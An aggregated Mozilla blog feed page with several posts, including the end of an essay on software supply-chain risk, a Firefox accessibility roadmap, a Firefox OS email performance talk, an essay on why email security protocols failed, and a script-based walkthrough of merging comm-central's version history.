Obviously, this only works if people actually do some kind of due diligence prior to depending on a component. Here at Mozilla, we do that to some extent, though it’s not really practical to review every line of code in a giant package like WebRTC There is some hope here as well: because modern languages such as Rust or Go are memory safe, it’s much easier to convince yourself that certain behaviors are impossible — even if the program has a defect — which makes it easier to audit.[6] Here too it’s possible to have clear manifests that describe what capabilities the program needs and verify (after some work) that those are accurate.

Summary

As I said at the beginning, Brewer et al. are definitely right to be worried about this kind of attack. It’s very convenient to be able to build on other people’s work, but the difficulty of ascertaining the quality of that work is an enormous problem[7]. Fortunately, we’re seeing a whole series of technological advancements that point the way to a solution without having to go back to the bad old days of writing everything yourself.

  1. Supply chain attacks can be mounted via a number of other mechanisms, but in this post, we are going to focus on this threat vector. ↩︎
  2. Where “critical” is defined by a somewhat complicated formula based roughly on the age of the project, how actively maintained it seems to be, how many other projects seem to use it, etc. It’s actually not clear to me that this is metric is that good a predictor of criticality; it seems mostly to have the advantage that it’s possible to evaluate purely by looking at the code repository, but presumably one could develop a metric that would be good. ↩︎
  3. Experience with TLS Extended Validation certificates, which attempt to verify company identity, suggests that this level of identity is straightforward to fake. ↩︎
  4. Allan Schiffman used to call this phenomenen a “distributed single point of failure”. ↩︎
  5. The technical term here is defense in depth. ↩︎
  6. Even better are verifiable systems such the HaCl* cryptographic library that Firefox depends on. HaCl* comes with a machine-checkable proof of correctness, which significantly reducing the need to audit all the code. Right now it’s only practical to do this kind of verification for relatively small programs, in large part because describing the specification that you are proving the program conforms to is hard, but the technology is rapidly getting better. ↩︎
  7. This is true even for basic quality reasons. Which of the two thousand ORMs for node is the best one to use? ↩︎

The post Notes on Addressing Supply Chain Vulnerabilities appeared first on The Mozilla Blog.

Categorieën: Mozilla-nl planet

Mozilla Accessibility: 2021 Firefox Accessibility Roadmap Update

Mozilla planet - za, 27/02/2021 - 00:03

We’ve spent the last couple of months finalizing our plans for 2021 and we’re ready to share them. What follows is a copy of the Firefox Accessibility Roadmap taken from the Mozilla Accessibility wiki.

Mozilla’s mission is to ensure the Internet is a global public resource, open and accessible to all. An Internet that truly puts people first, where individuals can shape their own experience and are empowered, safe and independent.

People with disabilities can experience huge benefits from technology but can also find it frustrating or worse, downright unusable. Mozilla’s Firefox accessibility team is committed to delivering products and services that are not just usable for people with disabilities, but a delight to use.

The Firefox accessibility (a11y) team will be spending much of 2021 re-building major pieces of our accessibility engine, the part of Firefox that powers screen readers and other assistive technologies.

While the current Firefox a11y engine has served us well for many years, new directions in browser architectures and operating systems coupled with the increasing complexity of the modern web means that some of Firefox’s venerable a11y engine needs a rebuild.

Browsers, including Firefox, once simple single process applications, have become complex multi-process systems that have to move lots of data between processes, which can cause performance slowdowns. In order to ensure the best performance and stability and to enable support for a growing, wider variety of accessibility tools in the future (such as Windows Narrator, Speech Recognition and Text Cursor Indicator), Firefox’s accessibility engine needs to be more robust and versatile. And where ATs used to spend significant resources ensuring a great experience across browsers, the dominance of one particular browser means less resources being committed to ensuring the ATs work well with Firefox. This changing landscape means that Firefox too must evolve significantly and that’s what we’re going to be doing in 2021.

The most important part of this rebuild of the Firefox accessibility engine is what we’re calling “cache the world”. Today, when an accessibility client wants to access web content, Firefox often has to send a request from its UI process to the web content process. Only a small amount of information is maintained in the UI process for faster response. Aside from the overhead of these requests, this can cause significant responsiveness problems, particularly if an accessibility client accesses many elements in the accessibility tree. The architecture we’re implementing this year will ameliorate these problems by sending the entire accessibility tree from the web content process to the UI process and keeping it up to date, ensuring that accessibility clients have the fastest possible response to their requests regardless of their complexity.

So that’s the biggest lift we’re planning for 2021 but that’s not all we’ll be doing. Firefox is always adding new features and adjusting existing features and the accessibility team will be spending significant effort ensuring that all of the Firefox changes are accessible. And we know we’re not perfect today so we’ll also be working through our backlog of defects, prioritizing and fixing the issues that cause the most severe problems for users with disabilities.

Firefox has a long history of providing great experiences for disabled people. To continue that legacy, we’re spending most of our resources this year on rebuilding core pieces of technology supporting those experiences. That means we won’t have the resources to tackle some issues we’d like to, but another piece of Firefox’s long history is that, through open source and open participation, you can help. This year, we can especially use your help identifying any new issues that take away from your experience as a disabled Firefox user, fixing high priority bugs that affect large numbers of disabled Firefox users, and spreading the word about the areas where Firefox excels as a browser for disabled users. Together, we can make 2021 a great year for Firefox accessibility.

The post 2021 Firefox Accessibility Roadmap Update appeared first on Mozilla Accessibility.

Categorieën: Mozilla-nl planet

Hacks.Mozilla.Org: Here’s what’s happening with the Firefox Nightly logo

Mozilla planet - vr, 26/02/2021 - 20:43
Fox Gate

The internet was set on fire (pun intended) this week, by what I’m calling ‘fox gate’, and chances are you might have seen a meme or two about the Firefox logo. Many people were pulling up for a battle royale because they thought we had scrubbed fox imagery from our browser.

This is definitely not happening.

The logo causing all the stir is one we created a while ago with input from our users. Back in 2019, we updated the Firefox browser logo and added the parent brand logo. 

What we learned throughout this, is that many of our users aren’t actually using the browser because then they’d know (no shade) the beloved fox icon is alive and well in Firefox on your desktop.

Shameless plug – you can download the browser here

Firefox logo OSX Dock

You can read more about how all this spiralled in the mini-case study on how the ‘fox gate’ misinformation spread online here.

screenshot of tweet with firefox logos, including parent logo

Long story short, the fox is here to stay and for our Firefox Nightly users out there, we’re bringing back a very special version of an older logo, as a treat.

Firefox Browser Nightly

Our commitment to privacy and a safe and open web remains the same. We hope you enjoy the nightly version of the logo and take some time to read up on spotting misinformation and fake news.

 

The post Here’s what’s happening with the Firefox Nightly logo appeared first on Mozilla Hacks - the Web developer blog.

Categorieën: Mozilla-nl planet

The Firefox Frontier: Remain Calm: the fox is still in the Firefox logo

Mozilla planet - vr, 26/02/2021 - 19:00

If you’ve been on the internet this week, chances are you might have seen a meme or two about the Firefox logo. And listen, that’s great news for us. Sure, … Read more

The post Remain Calm: the fox is still in the Firefox logo appeared first on The Firefox Frontier.

Categorieën: Mozilla-nl planet

Patrick Cloke: django-querysetsequence 0.14 released!

Mozilla planet - vr, 26/02/2021 - 18:31

django-querysetsequence 0.14 has been released with support for Django 3.2 (and Python 3.9). django-querysetsequence is a Django package for treating multiple QuerySet instances as a single QuerySet, this can be useful for treating similar models as a single model. The QuerySetSequence class supports much of the API …

Categorieën: Mozilla-nl planet

Ludovic Hirlimann: My geeking plans for this summer

Thunderbird - do, 07/05/2015 - 10:39

During July I’ll be visiting family in Mongolia but I’ve also a few things that are very geeky that I want to do.

The first thing I want to do is plug the Ripe Atlas probes I have. It’s litle devices that look like that :

Hello @ripe #Atlas !

They enable anybody with a ripe atlas or ripe account to make measurements for dns queries and others. This helps making a global better internet. I have three of these probes I’d like to install. It’s good because last time I checked Mongolia didn’t have any active probe. These probes will also help Internet become better in Mongolia. I’ll need to buy some network cables before leaving because finding these in mongolia is going to be challenging. More on atlas at https://atlas.ripe.net/.

The second thing I intend to do is map Mongolia a bit better on two projects the first is related to Mozilla and maps gps coordinateswith wifi access point. Only a little part of The capital Ulaanbaatar is covered as per https://location.services.mozilla.com/map#11/47.8740/106.9485 I want this to be way more because having an open data source for this is important in the future. As mapping is my new thing I’ll probably edit Openstreetmap in order to make the urban parts of mongolia that I’ll visit way more usable on all the services that use OSM as a source of truth. There is already a project to map the capital city at http://hotosm.org/projects/mongolia_mapping_ulaanbaatar but I believe osm can server more than just 50% of mongolia’s population.

I got inspired to write this post by mu son this morning, look what he is doing at 17 months :

Geeking on a Sun keyboard at 17 months
Categorieën: Mozilla-nl planet

Andrew Sutherland: Talk Script: Firefox OS Email Performance Strategies

Thunderbird - do, 30/04/2015 - 22:11

Last week I gave a talk at the Philly Tech Week 2015 Dev Day organized by the delightful people at technical.ly on some of the tricks/strategies we use in the Firefox OS Gaia Email app.  Note that the credit for implementing most of these techniques goes to the owner of the Email app’s front-end, James Burke.  Also, a special shout-out to Vivien for the initial DOM Worker patches for the email app.

I tried to avoid having slides that both I would be reading aloud as the audience read silently, so instead of slides to share, I have the talk script.  Well, I also have the slides here, but there’s not much to them.  The headings below are the content of the slides, except for the one time I inline some code.  Note that the live presentation must have differed slightly, because I’m sure I’m much more witty and clever in person than this script would make it seem…

Cover Slide: Who!

Hi, my name is Andrew Sutherland.  I work at Mozilla on the Firefox OS Email Application.  I’m here to share some strategies we used to make our HTML5 app Seem faster and sometimes actually Be faster.

What’s A Firefox OS (Screenshot Slide)

But first: What is a Firefox OS?  It’s a multiprocess Firefox gecko engine on an android linux kernel where all the apps including the system UI are implemented using HTML5, CSS, and JavaScript.  All the apps use some combination of standard web APIs and APIs that we hope to standardize in some form.

Firefox OS homescreen screenshot Firefox OS clock app screenshot Firefox OS email app screenshot

Here are some screenshots.  We’ve got the default home screen app, the clock app, and of course, the email app.

It’s an entirely client-side offline email application, supporting IMAP4, POP3, and ActiveSync.  The goal, like all Firefox OS apps shipped with the phone, is to give native apps on other platforms a run for their money.

And that begins with starting up fast.

Fast Startup: The Problems

But that’s frequently easier said than done.  Slow-loading websites are still very much a thing.

The good news for the email application is that a slow network isn’t one of its problems.  It’s pre-loaded on the phone.  And even if it wasn’t, because of the security implications of the TCP Web API and the difficulty of explaining this risk to users in a way they won’t just click through, any TCP-using app needs to be a cryptographically signed zip file approved by a marketplace.  So we do load directly from flash.

However, it’s not like flash on cellphones is equivalent to an infinitely fast, zero-latency network connection.  And even if it was, in a naive app you’d still try and load all of your HTML, CSS, and JavaScript at the same time because the HTML file would reference them all.  And that adds up.

It adds up in the form of event loop activity and competition with other threads and processes.  With the exception of Promises which get their own micro-task queue fast-lane, the web execution model is the same as all other UI event loops; events get scheduled and then executed in the same order they are scheduled.  Loading data from an asynchronous API like IndexedDB means that your read result gets in line behind everything else that’s scheduled.  And in the case of the bulk of shipped Firefox OS devices, we only have a single processor core so the thread and process contention do come into play.

So we try not to be a naive.

Seeming Fast at Startup: The HTML Cache

If we’re going to optimize startup, it’s good to start with what the user sees.  Once an account exists for the email app, at startup we display the default account’s inbox folder.

What is the least amount of work that we can do to show that?  Cache a screenshot of the Inbox.  The problem with that, of course, is that a static screenshot is indistinguishable from an unresponsive application.

So we did the next best thing, (which is) we cache the actual HTML we display.  At startup we load a minimal HTML file, our concatenated CSS, and just enough Javascript to figure out if we should use the HTML cache and then actually use it if appropriate.  It’s not always appropriate, like if our application is being triggered to display a compose UI or from a new mail notification that wants to show a specific message or a different folder.  But this is a decision we can make synchronously so it doesn’t slow us down.

Local Storage: Okay in small doses

We implement this by storing the HTML in localStorage.

Important Disclaimer!  LocalStorage is a bad API.  It’s a bad API because it’s synchronous.  You can read any value stored in it at any time, without waiting for a callback.  Which means if the data is not in memory the browser needs to block its event loop or spin a nested event loop until the data has been read from disk.  Browsers avoid this now by trying to preload the Entire contents of local storage for your origin into memory as soon as they know your page is being loaded.  And then they keep that information, ALL of it, in memory until your page is gone.

So if you store a megabyte of data in local storage, that’s a megabyte of data that needs to be loaded in its entirety before you can use any of it, and that hangs around in scarce phone memory.

To really make the point: do not use local storage, at least not directly.  Use a library like localForage that will use IndexedDB when available, and then fails over to WebSQLDatabase and local storage in that order.

Now, having sufficiently warned you of the terrible evils of local storage, I can say with a sorta-clear conscience… there are upsides in this very specific case.

The synchronous nature of the API means that once we get our turn in the event loop we can act immediately.  There’s no waiting around for an IndexedDB read result to gets its turn on the event loop.

This matters because although the concept of loading is simple from a User Experience perspective, there’s no standard to back it up right now.  Firefox OS’s UX desires are very straightforward.  When you tap on an app, we zoom it in.  Until the app is loaded we display the app’s icon in the center of the screen.  Unfortunately the standards are still assuming that the content is right there in the HTML.  This works well for document-based web pages or server-powered web apps where the contents of the page are baked in.  They work less well for client-only web apps where the content lives in a database and has to be dynamically retrieved.

The two events that exist are:

DOMContentLoaded” fires when the document has been fully parsed and all scripts not tagged as “async” have run.  If there were stylesheets referenced prior to the script tags, the script tags will wait for the stylesheet loads.

load” fires when the document has been fully loaded; stylesheets, images, everything.

But none of these have anything to do with the content in the page saying it’s actually done.  This matters because these standards also say nothing about IndexedDB reads or the like.  We tried to create a standards consensus around this, but it’s not there yet.  So Firefox OS just uses the “load” event to decide an app or page has finished loading and it can stop showing your app icon.  This largely avoids the dreaded “flash of unstyled content” problem, but it also means that your webpage or app needs to deal with this period of time by displaying a loading UI or just accepting a potentially awkward transient UI state.

(Trivial HTML slide)

<link rel=”stylesheet” ...> <script ...></script> DOMContentLoaded!

This is the important summary of our index.html.

We reference our stylesheet first.  It includes all of our styles.  We never dynamically load stylesheets because that compels a style recalculation for all nodes and potentially a reflow.  We would have to have an awful lot of style declarations before considering that.

Then we have our single script file.  Because the stylesheet precedes the script, our script will not execute until the stylesheet has been loaded.  Then our script runs and we synchronously insert our HTML from local storage.  Then DOMContentLoaded can fire.  At this point the layout engine has enough information to perform a style recalculation and determine what CSS-referenced image resources need to be loaded for buttons and icons, then those load, and then we’re good to be displayed as the “load” event can fire.

After that, we’re displaying an interactive-ish HTML document.  You can scroll, you can press on buttons and the :active state will apply.  So things seem real.

Being Fast: Lazy Loading and Optimized Layers

But now we need to try and get some logic in place as quickly as possible that will actually cash the checks that real-looking HTML UI is writing.  And the key to that is only loading what you need when you need it, and trying to get it to load as quickly as possible.

There are many module loading and build optimizing tools out there, and most frameworks have a preferred or required way of handling this.  We used the RequireJS family of Asynchronous Module Definition loaders, specifically the alameda loader and the r-dot-js optimizer.

One of the niceties of the loader plugin model is that we are able to express resource dependencies as well as code dependencies.

RequireJS Loader Plugins

var fooModule = require('./foo'); var htmlString = require('text!./foo.html'); var localizedDomNode = require('tmpl!./foo.html');

The standard Common JS loader semantics used by node.js and io.js are the first one you see here.  Load the module, return its exports.

But RequireJS loader plugins also allow us to do things like the second line where the exclamation point indicates that the load should occur using a loader plugin, which is itself a module that conforms to the loader plugin contract.  In this case it’s saying load the file foo.html as raw text and return it as a string.

But, wait, there’s more!  loader plugins can do more than that.  The third example uses a loader that loads the HTML file using the ‘text’ plugin under the hood, creates an HTML document fragment, and pre-localizes it using our localization library.  And this works un-optimized in a browser, no compilation step needed, but it can also be optimized.

So when our optimizer runs, it bundles up the core modules we use, plus, the modules for our “message list” card that displays the inbox.  And the message list card loads its HTML snippets using the template loader plugin.  The r-dot-js optimizer then locates these dependencies and the loader plugins also have optimizer logic that results in the HTML strings being inlined in the resulting optimized file.  So there’s just one single javascript file to load with no extra HTML file dependencies or other loads.

We then also run the optimizer against our other important cards like the “compose” card and the “message reader” card.  We don’t do this for all cards because it can be hard to carve up the module dependency graph for optimization without starting to run into cases of overlap where many optimized files redundantly include files loaded by other optimized files.

Plus, we have another trick up our sleeve:

Seeming Fast: Preloading

Preloading.  Our cards optionally know the other cards they can load.  So once we display a card, we can kick off a preload of the cards that might potentially be displayed.  For example, the message list card can trigger the compose card and the message reader card, so we can trigger a preload of both of those.

But we don’t go overboard with preloading in the frontend because we still haven’t actually loaded the back-end that actually does all the emaily email stuff.  The back-end is also chopped up into optimized layers along account type lines and online/offline needs, but the main optimized JS file still weighs in at something like 17 thousand lines of code with newlines retained.

So once our UI logic is loaded, it’s time to kick-off loading the back-end.  And in order to avoid impacting the responsiveness of the UI both while it loads and when we’re doing steady-state processing, we run it in a DOM Worker.

Being Responsive: Workers and SharedWorkers

DOM Workers are background JS threads that lack access to the page’s DOM, communicating with their owning page via message passing with postMessage.  Normal workers are owned by a single page.  SharedWorkers can be accessed via multiple pages from the same document origin.

By doing this, we stay out of the way of the main thread.  This is getting less important as browser engines support Asynchronous Panning & Zooming or “APZ” with hardware-accelerated composition, tile-based rendering, and all that good stuff.  (Some might even call it magic.)

When Firefox OS started, we didn’t have APZ, so any main-thread logic had the serious potential to result in janky scrolling and the impossibility of rendering at 60 frames per second.  It’s a lot easier to get 60 frames-per-second now, but even asynchronous pan and zoom potentially has to wait on dispatching an event to the main thread to figure out if the user’s tap is going to be consumed by app logic and preventDefault called on it.  APZ does this because it needs to know whether it should start scrolling or not.

And speaking of 60 frames-per-second…

Being Fast: Virtual List Widgets

…the heart of a mail application is the message list.  The expected UX is to be able to fling your way through the entire list of what the email app knows about and see the messages there, just like you would on a native app.

This is admittedly one of the areas where native apps have it easier.  There are usually list widgets that explicitly have a contract that says they request data on an as-needed basis.  They potentially even include data bindings so you can just point them at a data-store.

But HTML doesn’t yet have a concept of instantiate-on-demand for the DOM, although it’s being discussed by Firefox layout engine developers.  For app purposes, the DOM is a scene graph.  An extremely capable scene graph that can handle huge documents, but there are footguns and it’s arguably better to err on the side of fewer DOM nodes.

So what the email app does is we create a scroll-region div and explicitly size it based on the number of messages in the mail folder we’re displaying.  We create and render enough message summary nodes to cover the current screen, 3 screens worth of messages in the direction we’re scrolling, and then we also retain up to 3 screens worth in the direction we scrolled from.  We also pre-fetch 2 more screens worth of messages from the database.  These constants were arrived at experimentally on prototype devices.

We listen to “scroll” events and issue database requests and move DOM nodes around and update them as the user scrolls.  For any potentially jarring or expensive transitions such as coordinate space changes from new messages being added above the current scroll position, we wait for scrolling to stop.

Nodes are absolutely positioned within the scroll area using their ‘top’ style but translation transforms also work.  We remove nodes from the DOM, then update their position and their state before re-appending them.  We do this because the browser APZ logic tries to be clever and figure out how to create an efficient series of layers so that it can pre-paint as much of the DOM as possible in graphic buffers, AKA layers, that can be efficiently composited by the GPU.  Its goal is that when the user is scrolling, or something is being animated, that it can just move the layers around the screen or adjust their opacity or other transforms without having to ask the layout engine to re-render portions of the DOM.

When our message elements are added to the DOM with an already-initialized absolute position, the APZ logic lumps them together as something it can paint in a single layer along with the other elements in the scrolling region.  But if we start moving them around while they’re still in the DOM, the layerization logic decides that they might want to independently move around more in the future and so each message item ends up in its own layer.  This slows things down.  But by removing them and re-adding them it sees them as new with static positions and decides that it can lump them all together in a single layer.  Really, we could just create new DOM nodes, but we produce slightly less garbage this way and in the event there’s a bug, it’s nicer to mess up with 30 DOM nodes displayed incorrectly rather than 3 million.

But as neat as the layerization stuff is to know about on its own, I really mention it to underscore 2 suggestions:

1, Use a library when possible.  Getting on and staying on APZ fast-paths is not trivial, especially across browser engines.  So it’s a very good idea to use a library rather than rolling your own.

2, Use developer tools.  APZ is tricky to reason about and even the developers who write the Async pan & zoom logic can be surprised by what happens in complex real-world situations.  And there ARE developer tools available that help you avoid needing to reason about this.  Firefox OS has easy on-device developer tools that can help diagnose what’s going on or at least help tell you whether you’re making things faster or slower:

– it’s got a frames-per-second overlay; you do need to scroll like mad to get the system to want to render 60 frames-per-second, but it makes it clear what the net result is

– it has paint flashing that overlays random colors every time it paints the DOM into a layer.  If the screen is flashing like a discotheque or has a lot of smeared rainbows, you know something’s wrong because the APZ logic is not able to to just reuse its layers.

– devtools can enable drawing cool colored borders around the layers APZ has created so you can see if layerization is doing something crazy

There’s also fancier and more complicated tools in Firefox and other browsers like Google Chrome to let you see what got painted, what the layer tree looks like, et cetera.

And that’s my spiel.

Links

The source code to Gaia can be found at https://github.com/mozilla-b2g/gaia

The email app in particular can be found at https://github.com/mozilla-b2g/gaia/tree/master/apps/email

(I also asked for questions here.)

Categorieën: Mozilla-nl planet

Joshua Cranmer: Breaking news

Thunderbird - wo, 01/04/2015 - 09:00
It was brought to my attention recently by reputable sources that the recent announcement of increased usage in recent years produced an internal firestorm within Mozilla. Key figures raised alarm that some of the tech press had interpreted the blog post as a sign that Thunderbird was not, in fact, dead. As a result, they asked Thunderbird community members to make corrections to emphasize that Mozilla was trying to kill Thunderbird.

The primary fear, it seems, is that knowledge that the largest open-source email client was still receiving regular updates would impel its userbase to agitate for increased funding and maintenance of the client to help forestall potential threats to the open nature of email as well as to innovate in the space of providing usable and private communication channels. Such funding, however, would be an unaffordable luxury and would only distract Mozilla from its central goal of building developer productivity tooling. Persistent rumors that Mozilla would be willing to fund Thunderbird were it renamed Firefox Email were finally addressed with the comment, "such a renaming would violate our current policy that all projects be named Persona."

Categorieën: Mozilla-nl planet

Joshua Cranmer: Why email is hard, part 8: why email security failed

Thunderbird - di, 13/01/2015 - 05:38
This post is part 8 of an intermittent series exploring the difficulties of writing an email client. Part 1 describes a brief history of the infrastructure. Part 2 discusses internationalization. Part 3 discusses MIME. Part 4 discusses email addresses. Part 5 discusses the more general problem of email headers. Part 6 discusses how email security works in practice. Part 7 discusses the problem of trust. This part discusses why email security has largely failed.

At the end of the last part in this series, I posed the question, "Which email security protocol is most popular?" The answer to the question is actually neither S/MIME nor PGP, but a third protocol, DKIM. I haven't brought up DKIM until now because DKIM doesn't try to secure email in the same vein as S/MIME or PGP, but I still consider it relevant to discussing email security.

Unquestionably, DKIM is the only security protocol for email that can be considered successful. There are perhaps 4 billion active email addresses [1]. Of these, about 1-2 billion use DKIM. In contrast, S/MIME can count a few million users, and PGP at best a few hundred thousand. No other security protocols have really caught on past these three. Why did DKIM succeed where the others fail?

DKIM's success stems from its relatively narrow focus. It is nothing more than a cryptographic signature of the message body and a smattering of headers, and is itself stuck in the DKIM-Signature header. It is meant to be applied to messages only on outgoing servers and read and processed at the recipient mail server—it completely bypasses clients. That it bypasses clients allows it to solve the problem of key discovery and key management very easily (public keys are stored in DNS, which is already a key part of mail delivery), and its role in spam filtering is strong motivation to get it implemented quickly (it is 7 years old as of this writing). It's also simple: this one paragraph description is basically all you need to know [2].

The failure of S/MIME and PGP to see large deployment is certainly a large topic of discussion on myriads of cryptography enthusiast mailing lists, which often like to partake in propositions of new end-to-end encryption of email paradigms, such as the recent DIME proposal. Quite frankly, all of these solutions suffer broadly from at least the same 5 fundamental weaknesses, and I see it unlikely that a protocol will come about that can fix these weaknesses well enough to become successful.

The first weakness, and one I've harped about many times already, is UI. Most email security UI is abysmal and generally at best usable only by enthusiasts. At least some of this is endemic to security: while it mean seem obvious how to convey what an email signature or an encrypted email signifies, how do you convey the distinctions between sign-and-encrypt, encrypt-and-sign, or an S/MIME triple wrap? The Web of Trust model used by PGP (and many other proposals) is even worse, in that inherently requires users to do other actions out-of-band of email to work properly.

Trust is the second weakness. Consider that, for all intents and purposes, the email address is the unique identifier on the Internet. By extension, that implies that a lot of services are ultimately predicated on the notion that the ability to receive and respond to an email is a sufficient means to identify an individual. However, the entire purpose of secure email, or at least of end-to-end encryption, is subtly based on the fact that other people in fact have access to your mailbox, thus destroying the most natural ways to build trust models on the Internet. The quest for anonymity or privacy also renders untenable many other plausible ways to establish trust (e.g., phone verification or government-issued ID cards).

Key discovery is another weakness, although it's arguably the easiest one to solve. If you try to keep discovery independent of trust, the problem of key discovery is merely picking a protocol to publish and another one to find keys. Some of these already exist: PGP key servers, for example, or using DANE to publish S/MIME or PGP keys.

Key management, on the other hand, is a more troubling weakness. S/MIME, for example, basically works without issue if you have a certificate, but managing to get an S/MIME certificate is a daunting task (necessitated, in part, by its trust model—see how these issues all intertwine?). This is also where it's easy to say that webmail is an unsolvable problem, but on further reflection, I'm not sure I agree with that statement anymore. One solution is just storing the private key with the webmail provider (you're trusting them as an email client, after all), but it's also not impossible to imagine using phones or flash drives as keystores. Other key management factors are more difficult to solve: people who lose their private keys or key rollover create thorny issues. There is also the difficulty of managing user expectations: if I forget my password to most sites (even my email provider), I can usually get it reset somehow, but when a private key is lost, the user is totally and completely out of luck.

Of course, there is one glaring and almost completely insurmountable problem. Encrypted email fundamentally precludes certain features that we have come to take for granted. The lesser known is server-side search and filtration. While there exist some mechanisms to do search on encrypted text, those mechanisms rely on the fact that you can manipulate the text to change the message, destroying the integrity feature of secure email. They also tend to be fairly expensive. It's easy to just say "who needs server-side stuff?", but the contingent of people who do email on smartphones would not be happy to have to pay the transfer rates to download all the messages in their folder just to find one little email, nor the energy costs of doing it on the phone. And those who have really large folders—Fastmail has a design point of 1,000,000 in a single folder—would still prefer to not have to transfer all their mail even on desktops.

The more well-known feature that would disappear is spam filtration. Consider that 90% of all email is spam, and if you think your spam folder is too slim for that to be true, it's because your spam folder only contains messages that your email provider wasn't sure were spam. The loss of server-side spam filtering would dramatically increase the cost of spam (a 10% reduction in efficiency would double the amount of server storage, per my calculations), and client-side spam filtering is quite literally too slow [3] and too costly (remember smartphones? Imagine having your email take 10 times as much energy and bandwidth) to be a tenable option. And privacy or anonymity tends to be an invitation to abuse (cf. Tor and Wikipedia). Proposed solutions to the spam problem are so common that there is a checklist containing most of the objections.

When you consider all of those weaknesses, it is easy to be pessimistic about the possibility of wide deployment of powerful email security solutions. The strongest future—all email is encrypted, including metadata—is probably impossible or at least woefully impractical. That said, if you weaken some of the assumptions (say, don't desire all or most traffic to be encrypted), then solutions seem possible if difficult.

This concludes my discussion of email security, at least until things change for the better. I don't have a topic for the next part in this series picked out (this part actually concludes the set I knew I wanted to discuss when I started), although OAuth and DMARC are two topics that have been bugging me enough recently to consider writing about. They also have the unfortunate side effect of being things likely to see changes in the near future, unlike most of the topics I've discussed so far. But rest assured that I will find more difficulties in the email infrastructure to write about before long!

[1] All of these numbers are crude estimates and are accurate to only an order of magnitude. To justify my choices: I assume 1 email address per Internet user (this overestimates the developing world and underestimates the developed world). The largest webmail providers have given numbers that claim to be 1 billion active accounts between them, and all of them use DKIM. S/MIME is guessed by assuming that any smartcard deployment supports S/MIME, and noting that the US Department of Defense and Estonia's digital ID project are both heavy users of such smartcards. PGP is estimated from the size of the strong set and old numbers on the reachable set from the core Web of Trust.
[2] Ever since last April, it's become impossible to mention DKIM without referring to DMARC, as a result of Yahoo's controversial DMARC policy. A proper discussion of DMARC (and why what Yahoo did was controversial) requires explaining the mail transmission architecture and spam, however, so I'll defer that to a later post. It's also possible that changes in this space could happen within the next year.
[3] According to a former GMail spam employee, if it takes you as long as three minutes to calculate reputation, the spammer wins.

Categorieën: Mozilla-nl planet

Joshua Cranmer: A unified history for comm-central

Thunderbird - za, 10/01/2015 - 18:55
Several years back, Ehsan and Jeff Muizelaar attempted to build a unified history of mozilla-central across the Mercurial era and the CVS era. Their result is now used in the gecko-dev repository. While being distracted on yet another side project, I thought that I might want to do the same for comm-central. It turns out that building a unified history for comm-central makes mozilla-central look easy: mozilla-central merely had one import from CVS. In contrast, comm-central imported twice from CVS (the calendar code came later), four times from mozilla-central (once with converted history), and imported twice from Instantbird's repository (once with converted history). Three of those conversions also involved moving paths. But I've worked through all of those issues to provide a nice snapshot of the repository [1]. And since I've been frustrated by failing to find good documentation on how this sort of process went for mozilla-central, I'll provide details on the process for comm-central.

The first step and probably the hardest is getting the CVS history in DVCS form (I use hg because I'm more comfortable it, but there's effectively no difference between hg, git, or bzr here). There is a git version of mozilla's CVS tree available, but I've noticed after doing research that its last revision is about a month before the revision I need for Calendar's import. The documentation for how that repo was built is no longer on the web, although we eventually found a copy after I wrote this post on git.mozilla.org. I tried doing another conversion using hg convert to get CVS tags, but that rudely blew up in my face. For now, I've filed a bug on getting an official, branchy-and-tag-filled version of this repository, while using the current lack of history as a base. Calendar people will have to suffer missing a month of history.

CVS is famously hard to convert to more modern repositories, and, as I've done my research, Mozilla's CVS looks like it uses those features which make it difficult. In particular, both the calendar CVS import and the comm-central initial CVS import used a CVS tag HG_COMM_INITIAL_IMPORT. That tagging was done, on only a small portion of the tree, twice, about two months apart. Fortunately, mailnews code was never touched on CVS trunk after the import (there appears to be one commit on calendar after the tagging), so it is probably possible to salvage a repository-wide consistent tag.

The start of my script for conversion looks like this:

#!/bin/bash set -e WORKDIR=/tmp HGCVS=$WORKDIR/mozilla-cvs-history MC=/src/trunk/mozilla-central CC=/src/trunk/comm-central OUTPUT=$WORKDIR/full-c-c # Bug 445146: m-c/editor/ui -> c-c/editor/ui MC_EDITOR_IMPORT=d8064eff0a17372c50014ee305271af8e577a204 # Bug 669040: m-c/db/mork -> c-c/db/mork MC_MORK_IMPORT=f2a50910befcf29eaa1a29dc088a8a33e64a609a # Bug 1027241, bug 611752 m-c/security/manager/ssl/** -> c-c/mailnews/mime/src/* MC_SMIME_IMPORT=e74c19c18f01a5340e00ecfbc44c774c9a71d11d # Step 0: Grab the mozilla CVS history. if [ ! -e $HGCVS ]; then hg clone git+https://github.com/jrmuizel/mozilla-cvs-history.git $HGCVS fi

Since I don't want to include the changesets useless to comm-central history, I trimmed the history by using hg convert to eliminate changesets that don't change the necessary files. Most of the files are simple directory-wide changes, but S/MIME only moved a few files over, so it requires a more complex way to grab the file list. In addition, I also replaced the % in the usernames with @ that they are used to appearing in hg. The relevant code is here:

# Step 1: Trim mozilla CVS history to include only the files we are ultimately # interested in. cat >$WORKDIR/convert-filemap.txt <<EOF # Revision e4f4569d451a include directory/xpcom include mail include mailnews include other-licenses/branding/thunderbird include suite # Revision 7c0bfdcda673 include calendar include other-licenses/branding/sunbird # Revision ee719a0502491fc663bda942dcfc52c0825938d3 include editor/ui # Revision 52efa9789800829c6f0ee6a005f83ed45a250396 include db/mork/ include db/mdb/ EOF # Add the S/MIME import files hg -R $MC log -r "children($MC_SMIME_IMPORT)" \ --template "{file_dels % 'include {file}\n'}" >>$WORKDIR/convert-filemap.txt if [ ! -e $WORKDIR/convert-authormap.txt ]; then hg -R $HGCVS log --template "{email(author)}={sub('%', '@', email(author))}\n" \ | sort -u > $WORKDIR/convert-authormap.txt fi cd $WORKDIR hg convert $HGCVS $OUTPUT --filemap convert-filemap.txt -A convert-authormap.txt

That last command provides us the subset of the CVS history that we need for unified history. Strictly speaking, I should be pulling a specific revision, but I happen to know that there's no need to (we're cloning the only head) in this case. At this point, we now need to pull in the mozilla-central changes before we pull in comm-central. Order is key; hg convert will only apply the graft points when converting the child changeset (which it does but once), and it needs the parents to exist before it can do that. We also need to ensure that the mozilla-central graft point is included before continuing, so we do that, and then pull mozilla-central:

